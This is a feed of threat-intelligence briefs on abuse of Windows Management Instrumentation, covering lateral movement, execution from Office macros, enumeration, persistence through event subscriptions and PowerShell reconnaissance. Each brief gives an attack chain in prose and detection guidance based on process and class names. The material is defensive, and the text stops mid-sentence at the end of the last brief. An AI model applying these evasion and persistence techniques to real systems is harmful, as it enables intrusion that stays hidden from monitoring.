{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/wmi/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","wmi","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis brief describes a lateral movement technique that leverages Windows Management Instrumentation (WMI) through a tool named StealthyWMIExec.py. The tool aims to provide a \u0026ldquo;stealthy\u0026rdquo; approach to executing commands on remote systems. The original post on Reddit\u0026rsquo;s blueteamsec forum, from March 2026, discusses a method for achieving lateral movement while potentially bypassing security monitoring that focuses on standard command execution patterns. Defenders should expect adversaries to use WMI for command execution precisely because it blends in with legitimate administrative activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system within the target network.\u003c/li\u003e\n\u003cli\u003eAttacker authenticates to a remote host with valid credentials (by default, remote WMI execution requires an account in the target\u0026rsquo;s local Administrators group) or exploits a vulnerability to gain access to it.\u003c/li\u003e\n\u003cli\u003eAttacker uses the StealthyWMIExec.py script (or a similar WMI-based execution tool) from the already-compromised system.\u003c/li\u003e\n\u003cli\u003eThe script establishes a WMI connection to the target machine.\u003c/li\u003e\n\u003cli\u003eThe script executes commands on the remote host using WMI\u0026rsquo;s \u003ccode\u003eWin32_Process\u003c/code\u003e class; on the target, the new process is a child of WmiPrvSE.exe.\u003c/li\u003e\n\u003cli\u003eThe output of the executed command is retrieved via WMI.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the information obtained to further compromise the network or achieve other 
objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful WMI-based lateral movement can lead to the compromise of multiple systems within a network, and from there to data exfiltration, ransomware deployment, or other malicious activity, depending on the attacker\u0026rsquo;s objectives. Techniques that avoid the usual execution telemetry may allow attackers to remain undetected for longer, increasing the potential damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor the Microsoft-Windows-WMI-Activity/Operational log for activity indicative of lateral movement. Event ID 5857 records a provider being loaded into a WmiPrvSE.exe host, 5858 records failed WMI operations together with the ClientMachine and User that issued them, and 5859 and 5861 record permanent event subscriptions and their filter-to-consumer bindings. A successful remote \u003ccode\u003eWin32_Process\u003c/code\u003e call produces at most a 5857 provider-load event (and none at all if the provider is already loaded), so pair this log with process creation telemetry.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rules provided to detect unusual WMI process creation and script execution.\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs (Sysmon Event ID 1) with command-line arguments. On the target the tool itself never runs, so hunt for unusual child processes of WmiPrvSE.exe rather than for the script name.\u003c/li\u003e\n\u003cli\u003eRestrict WMI access to authorized users and systems only to limit the attack surface for this technique.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T19:03:04Z","date_published":"2026-03-16T19:03:04Z","id":"/briefs/2024-05-stealthy-wmi-exec/","summary":"The StealthyWMIExec.py script facilitates lateral movement via WMI, potentially evading standard detection mechanisms by employing stealthy techniques.","title":"Stealthy WMI Lateral Movement via StealthyWMIExec.py","url":"https://feed.craftedsignal.io/briefs/2024-05-stealthy-wmi-exec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["WINWORD.EXE","EXCEL.EXE","POWERPNT.EXE","MSPUB.EXE","MSACCESS.EXE"],"_cs_severities":["medium"],"_cs_tags":["wmi","image load","office","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious image loading of 
\u003ccode\u003ewmiutils.dll\u003c/code\u003e from Microsoft Office processes (WINWORD.EXE, EXCEL.EXE, POWERPNT.EXE, MSPUB.EXE, MSACCESS.EXE). Adversaries use this technique to execute code while evading detections that key on child processes spawned directly by Microsoft Office products: when a macro creates a process through Windows Management Instrumentation (WMI), the new process is a child of WmiPrvSE.exe rather than of the Office application, so the Office process loading the WMI client library is the observable that remains.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser opens a malicious Microsoft Office document (e.g., Word, Excel).\u003c/li\u003e\n\u003cli\u003eThe document contains a macro or exploit that calls into WMI (typically a VBA macro that obtains a \u003ccode\u003ewinmgmts:\u003c/code\u003e object and invokes \u003ccode\u003eWin32_Process\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe Office process itself loads \u003ccode\u003ewmiutils.dll\u003c/code\u003e to talk to the WMI service; this load is unusual for normal Office operations and is what the rule detects.\u003c/li\u003e\n\u003cli\u003eThe WMI service dispatches the request to the WMI Provider Host, WmiPrvSE.exe, which creates the requested process; the Office application never appears as its parent.\u003c/li\u003e\n\u003cli\u003eThe WMI commands execute malicious code, potentially downloading or executing further payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence through WMI event subscriptions or other methods.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement using WMI to execute commands on other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, establish persistence, and move laterally within the network, potentially leading to data exfiltration, system compromise, or ransomware deployment. 
While the number of victims is unknown, this technique can be used in targeted attacks against organizations that heavily rely on Microsoft Office applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious WMI Image Load from MS Office\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon event ID 7 (Image Loaded) logging for comprehensive image load monitoring as suggested in the \u003ca href=\"https://ela.st/sysmon-event-7-setup\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for Microsoft Office applications spawning WMI-related processes (e.g., \u003ccode\u003ewbemtest.exe\u003c/code\u003e, \u003ccode\u003ewmic.exe\u003c/code\u003e) to detect potential WMI abuse.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit lateral movement in case of a successful WMI-based attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T12:00:00Z","date_published":"2024-01-09T12:00:00Z","id":"/briefs/2024-01-suspicious-wmi-image-load/","summary":"Adversaries may exploit Windows Management Instrumentation (WMI) to execute code stealthily, bypassing traditional security measures by loading `wmiutils.dll` from Microsoft Office applications, potentially indicating malicious execution.","title":"Suspicious WMI Image Load from MS Office","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-wmi-image-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["enumeration","wmi","discovery","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers can leverage the Windows Management Instrumentation (WMI) to 
execute commands for reconnaissance and enumeration within a compromised system. A process created through WMI is spawned by the WMI Provider Host (WmiPrvSE.exe) rather than by the attacker\u0026rsquo;s own shell, which breaks the parent/child relationship that most process-based detections rely on. The activity is typically used to gather system and network information as a precursor to lateral movement or privilege escalation, and it matters because the parent process looks like ordinary system activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses WMI to execute a reconnaissance command.\u003c/li\u003e\n\u003cli\u003eThe WMI service dispatches the request to WmiPrvSE.exe, which creates the process the attacker specified.\u003c/li\u003e\n\u003cli\u003eThe attacker executes commands such as \u003ccode\u003eipconfig.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e via WmiPrvSE.exe to gather network configuration details, user information, and system information; each shows up in process creation telemetry with WmiPrvSE.exe as the parent.\u003c/li\u003e\n\u003cli\u003eThe enumerated information is collected and potentially exfiltrated to a command and control server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information to identify further targets within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems using stolen credentials or exploited vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, ransomware deployment, or persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of enumeration commands via WMIPrvSE allows attackers to gather sensitive information about 
the system and network environment. This information can be used to facilitate lateral movement, privilege escalation, and data theft, potentially leading to significant financial loss, reputational damage, and disruption of business operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the execution of enumeration commands (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Enumeration Command Spawned via WMIPrvSE\u0026rdquo; to your SIEM to detect suspicious WMIPrvSE activity (Sigma rule).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of WMIPrvSE spawning common enumeration tools such as \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, or \u003ccode\u003esysteminfo.exe\u003c/code\u003e (Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the scope of potential lateral movement following successful enumeration (Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-wmiprvse-enumeration/","summary":"This rule detects suspicious execution of system enumeration commands by the Windows Management Instrumentation Provider Service (WMIPrvSE), indicating potential reconnaissance or malicious activity on Windows systems.","title":"Suspicious Enumeration Commands Spawned via WMIPrvSE","url":"https://feed.craftedsignal.io/briefs/2024-01-wmiprvse-enumeration/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["HPWBEM","SCCM","Windows Management Instrumentation",".NET Framework"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","wmi","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","HP","Nessus"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of lateral movement within a Windows 
environment via Windows Management Instrumentation (WMI). WMI, a core Windows feature, is often abused by adversaries to execute processes on remote hosts without dropping a tool on them. This activity is detected by correlating inbound network connections with process executions on the same host, while filtering out common false positives associated with legitimate administrative use, security tools, and system processes. The goal is to highlight potential threats indicative of unauthorized lateral movement.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker uses WMI to connect to a remote host. The DCOM session starts with the RPC endpoint mapper on TCP port 135 and then continues on a dynamically assigned high port.\u003c/li\u003e\n\u003cli\u003eThe svchost.exe process hosting the RPC endpoint mapper on the target accepts the incoming connection from the attacker-controlled system; Sysmon records this as Event ID 3 with Initiated set to false.\u003c/li\u003e\n\u003cli\u003eWmiPrvSE.exe, the WMI provider host process, spawns a new process for the attacker\u0026rsquo;s WMI command; Sysmon records this as Event ID 1 with WmiPrvSE.exe as the parent image.\u003c/li\u003e\n\u003cli\u003eThe spawned process executes the attacker\u0026rsquo;s payload or command on the remote host.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the executed process for further actions, such as data exfiltration or establishing persistence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation and lateral movement via WMI can lead to unauthorized access to sensitive data, compromise of critical systems, and propagation of malware throughout the network. 
While specific victim counts or sector targeting data are unavailable, the broad applicability of WMI across Windows environments makes this a relevant threat for a wide range of organizations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 3 (Network Connection) logging to provide the necessary data for the rules below; the Event ID 3 configuration must not exclude inbound connections to svchost.exe, or the correlation has nothing to key on.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious WMI activity and tune them for your environment.\u003c/li\u003e\n\u003cli\u003eReview and create exceptions for known administrative accounts or specific IP addresses used by IT staff to reduce false positives, as mentioned in the overview.\u003c/li\u003e\n\u003cli\u003eIsolate any affected host from the network to prevent further lateral movement if suspicious WMI activity is detected.\u003c/li\u003e\n\u003cli\u003eMonitor inbound connections to destination port 135 from hosts that are not known management systems. Because the session moves to a dynamic high port after the endpoint-mapper exchange, a port-135-only filter sees the start of the session but not the follow-on traffic, so correlate it with process creation on the target rather than relying on the port alone.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-wmi-lateral-movement/","summary":"Detection of processes executed via Windows Management Instrumentation (WMI) on a remote host indicating potential adversary lateral movement.","title":"WMI Incoming Lateral Movement","url":"https://feed.craftedsignal.io/briefs/2024-01-03-wmi-lateral-movement/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Sysmon"],"_cs_severities":["medium"],"_cs_tags":["windows","wmi","script_execution","initial_access","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection identifies the use of Windows script interpreters (cscript.exe or wscript.exe) to execute processes via Windows Management Instrumentation (WMI). 
Adversaries exploit WMI to execute scripts or processes stealthily, often using script interpreters. The rule monitors for these interpreters executing processes via WMI, specifically when initiated by non-system accounts, indicating potential malicious intent. The detection focuses on identifying scenarios where \u003ccode\u003ewmiutils.dll\u003c/code\u003e is loaded by \u003ccode\u003ewscript.exe\u003c/code\u003e or \u003ccode\u003ecscript.exe\u003c/code\u003e, followed by \u003ccode\u003ewmiprvse.exe\u003c/code\u003e spawning a new process. This is often associated with malicious initial access or execution techniques.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access via phishing (T1566) or other means.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a script, such as VBScript or JavaScript (T1059.005, T1059.007), to execute commands using WMI.\u003c/li\u003e\n\u003cli\u003eThe script interpreter (\u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e) loads \u003ccode\u003ewmiutils.dll\u003c/code\u003e to interact with WMI.\u003c/li\u003e\n\u003cli\u003eThe WMI service dispatches the script\u0026rsquo;s request to the WMI Provider Host (\u003ccode\u003ewmiprvse.exe\u003c/code\u003e), which becomes the parent of whatever the script asked to run.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewmiprvse.exe\u003c/code\u003e executes a secondary process, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, or other executables, often from unusual locations like \u003ccode\u003eC:\\Users\\\u003c/code\u003e or \u003ccode\u003eC:\\ProgramData\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed process performs malicious actions, such as downloading additional payloads or establishing persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to maintain persistence by creating scheduled tasks or modifying registry 
keys.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often lateral movement, data exfiltration, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code, bypass security controls, and establish persistence on the compromised system. The use of WMI enables stealthy execution, making detection challenging. The impact can range from data theft and system compromise to full network takeover. In some cases, threat actors may deploy ransomware, leading to significant financial losses and operational disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 1 (Process Creation) and Event ID 7 (Image Loaded) logging to provide the necessary data for the provided Sigma rules. Event ID 7 is high-volume, so scope the Sysmon image-load rules to the libraries of interest (here \u003ccode\u003ewmiutils.dll\u003c/code\u003e) rather than logging every load.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u0026ldquo;WMI Scripting Process Creation\u0026rdquo; to detect suspicious process creation events originating from \u003ccode\u003ewmiprvse.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by that rule with a focus on processes spawned by \u003ccode\u003ewmiprvse.exe\u003c/code\u003e from unusual locations or with suspicious command-line arguments.\u003c/li\u003e\n\u003cli\u003eImplement endpoint protection policies that block or alert on the high-risk processes listed in the detection query when they are launched by non-system accounts, as mentioned in the overview, and review those policies regularly.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-script-execution/","summary":"The 
rule identifies the use of Windows script interpreters (cscript.exe or wscript.exe) executing a process via Windows Management Instrumentation (WMI), which may indicate malicious activity, especially when initiated by non-system accounts.","title":"Windows Script Interpreter Executing Process via WMI","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon","Elastic Defend","Elastic Endpoint Security","CrowdStrike Falcon","SentinelOne Cloud Funnel","Windows Security Event Logs","winlogbeat"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows","wmi"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne","Elastic"],"content_html":"\u003cp\u003eWindows Management Instrumentation (WMI) provides a powerful framework for managing Windows systems, but adversaries can abuse its capabilities to establish persistence. By creating WMI event subscriptions, attackers can execute arbitrary code in response to defined system events. A permanent subscription consists of three objects in the \u003ccode\u003eroot\\subscription\u003c/code\u003e namespace: an event filter (\u003ccode\u003e__EventFilter\u003c/code\u003e) holding a WQL query that selects the trigger, an event consumer that carries the payload, and a \u003ccode\u003e__FilterToConsumerBinding\u003c/code\u003e that links the two so the payload runs automatically. These objects can be created with tools like \u003ccode\u003ewmic.exe\u003c/code\u003e, which allows the creation of event consumers such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e. Successful exploitation of WMI for persistence allows attackers to maintain unauthorized access to a compromised system even after reboots, because the subscription lives in the WMI repository and the consumer is executed by the WMI service in the SYSTEM context (\u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e scripts run inside scrcons.exe, which is therefore itself worth watching as a parent process). 
This activity has been observed across various environments, highlighting the need for robust detection mechanisms to identify and prevent WMI-based persistence.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ewmic.exe\u003c/code\u003e to create a WMI event filter that defines a specific event to monitor.\u003c/li\u003e\n\u003cli\u003eA WMI event consumer, such as \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, is created using \u003ccode\u003ewmic.exe\u003c/code\u003e specifying the malicious code or script to execute when the event occurs.\u003c/li\u003e\n\u003cli\u003eA WMI binding is established between the event filter and the event consumer using \u003ccode\u003ewmic.exe\u003c/code\u003e, linking the event to the action.\u003c/li\u003e\n\u003cli\u003eThe malicious WMI event subscription is activated, monitoring for the defined event.\u003c/li\u003e\n\u003cli\u003eWhen the specified event occurs, the WMI service triggers the execution of the associated malicious code or script through the event consumer.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the system, as the WMI event subscription will re-activate after reboots.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform additional malicious activities, such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of WMI for persistence can allow an attacker to maintain long-term, unauthorized access to a compromised system. This can result in data theft, system compromise, and further malicious activities. 
While the exact number of victims is not specified in the source, the broad applicability of this technique means that many Windows systems are potentially at risk. If the attack succeeds, the attacker gains a foothold on the system that is difficult to detect and remove, which can lead to significant operational disruption and financial loss.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging and monitor for \u003ccode\u003ewmic.exe\u003c/code\u003e with command-line arguments related to creating event consumers, specifically \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e or \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e, to trigger the Sigma rule \u0026ldquo;Detect Suspicious WMIC Process\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect suspicious WMI event subscription creation.\u003c/li\u003e\n\u003cli\u003eReview the investigation steps outlined in the provided documentation to triage and analyze potential WMI persistence attempts.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs and Sysmon for events related to WMI activity for broader coverage.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-persistence/","summary":"Adversaries can leverage Windows Management Instrumentation (WMI) to establish persistence by creating event subscriptions that trigger malicious code execution when specific events occur, using tools like wmic.exe to create event consumers.","title":"Persistence via WMI Event Subscription","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-persistence/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic 
Defend"],"_cs_severities":["medium"],"_cs_tags":["persistence","wmi","windows","event-subscription"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers abuse Windows Management Instrumentation (WMI) event subscriptions to establish persistence on compromised systems. By creating WMI event subscriptions that trigger malicious actions based on system events, adversaries can ensure their code executes automatically. This technique is particularly effective because WMI is a legitimate system administration tool, making malicious activity harder to detect. This rule focuses on detecting suspicious WMI event consumers, specifically \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e and \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e. The detection leverages Sysmon Event ID 21 (WmiEventConsumerToFilter, the binding between a filter and a consumer; Sysmon records filter creation as Event ID 19 and consumer creation as Event ID 20) together with endpoint API events for \u003ccode\u003eIWbemServices::PutInstance\u003c/code\u003e, the call used to write these objects into the WMI repository. The rule\u0026rsquo;s lookback window is 9 minutes.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to the system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell or another scripting language to interact with the WMI service.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a new WMI event filter to monitor for a specific system event.\u003c/li\u003e\n\u003cli\u003eThe attacker creates a WMI event consumer, such as \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e or \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e, to execute a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe attacker links the event filter and consumer by creating a \u003ccode\u003e__FilterToConsumerBinding\u003c/code\u003e; only once this binding exists is the subscription live.\u003c/li\u003e\n\u003cli\u003eThe malicious WMI event subscription persists across reboots.\u003c/li\u003e\n\u003cli\u003eWhen the specified event occurs, the malicious consumer executes the 
attacker\u0026rsquo;s payload.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access and can perform further malicious activities, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to maintain persistent access to the compromised system, even after reboots or other system changes. This can lead to long-term data theft, system compromise, or the deployment of ransomware. While the number of victims is unknown, this technique can be used against a wide range of Windows systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable the Sysmon WmiEvent rule group so that Event IDs 19, 20 and 21 are recorded. Event ID 21 (the filter-to-consumer binding) is the one this rule keys on; 19 and 20 supply the filter query and the consumer payload needed for triage.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious WMI Event Subscription Creation\u0026rdquo; to your SIEM to identify potentially malicious WMI activity.\u003c/li\u003e\n\u003cli\u003eInvestigate any process associated with the \u003ccode\u003eIWbemServices::PutInstance\u003c/code\u003e API call, particularly those creating \u003ccode\u003eCommandLineEventConsumer\u003c/code\u003e or \u003ccode\u003eActiveScriptEventConsumer\u003c/code\u003e instances, as indicated in the Attack Chain section.\u003c/li\u003e\n\u003cli\u003eMonitor for processes or activities around the time of the event to identify potential lateral movement or further persistence mechanisms as outlined in the overview.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wmi-event-subscription/","summary":"This threat brief details the detection of malicious Windows Management Instrumentation (WMI) event subscriptions, a technique used by attackers for persistence and privilege escalation on Windows systems.","title":"Detect Suspicious WMI Event 
Subscription Creation for Persistence","url":"https://feed.craftedsignal.io/briefs/2024-01-wmi-event-subscription/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["high"],"_cs_tags":["powershell","wmi","reconnaissance","lateral_movement","windows"],"_cs_type":"advisory","_cs_vendors":["Splunk"],"content_html":"\u003cp\u003eThis brief focuses on detecting reconnaissance activities performed through PowerShell using WMI queries. Adversaries often use WMI to gather detailed information about a compromised system, including hardware specifications, operating system details, and installed software. This information can be used to plan further attacks, such as privilege escalation or lateral movement. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify specific WMI queries that target system information classes like \u003ccode\u003eWin32_Bios\u003c/code\u003e, \u003ccode\u003eWin32_OperatingSystem\u003c/code\u003e, \u003ccode\u003eWin32_Processor\u003c/code\u003e and others. Identifying this behavior early can help defenders disrupt attack chains before significant damage occurs. 
The analytic is based on the detection logic from the Splunk Security Content project as of April 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the target system, potentially through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a PowerShell script, either directly or via a command-line interpreter like \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe PowerShell script uses the \u003ccode\u003eGet-WmiObject\u003c/code\u003e cmdlet or a direct WMI query with \u003ccode\u003eSELECT\u003c/code\u003e to query system information.\u003c/li\u003e\n\u003cli\u003eSpecific WMI classes are targeted, including \u003ccode\u003eWin32_Bios\u003c/code\u003e, \u003ccode\u003eWin32_OperatingSystem\u003c/code\u003e, \u003ccode\u003eWin32_Processor\u003c/code\u003e, \u003ccode\u003eWin32_ComputerSystem\u003c/code\u003e, \u003ccode\u003eWin32_PnPEntity\u003c/code\u003e, \u003ccode\u003eWin32_ShadowCopy\u003c/code\u003e, \u003ccode\u003eWin32_DiskDrive\u003c/code\u003e, \u003ccode\u003eWin32_PhysicalMemory\u003c/code\u003e, \u003ccode\u003eWin32_BaseBoard\u003c/code\u003e, and \u003ccode\u003eWin32_DisplayConfiguration\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script collects the data returned by the WMI queries.\u003c/li\u003e\n\u003cli\u003eThe gathered information is used to profile the system and identify potential vulnerabilities or weaknesses.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gathered information to plan subsequent stages of the attack, like lateral movement or privilege escalation.\u003c/li\u003e\n\u003cli\u003eThe attacker executes further commands based on the gathered information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful reconnaissance can provide attackers with a comprehensive understanding of the 
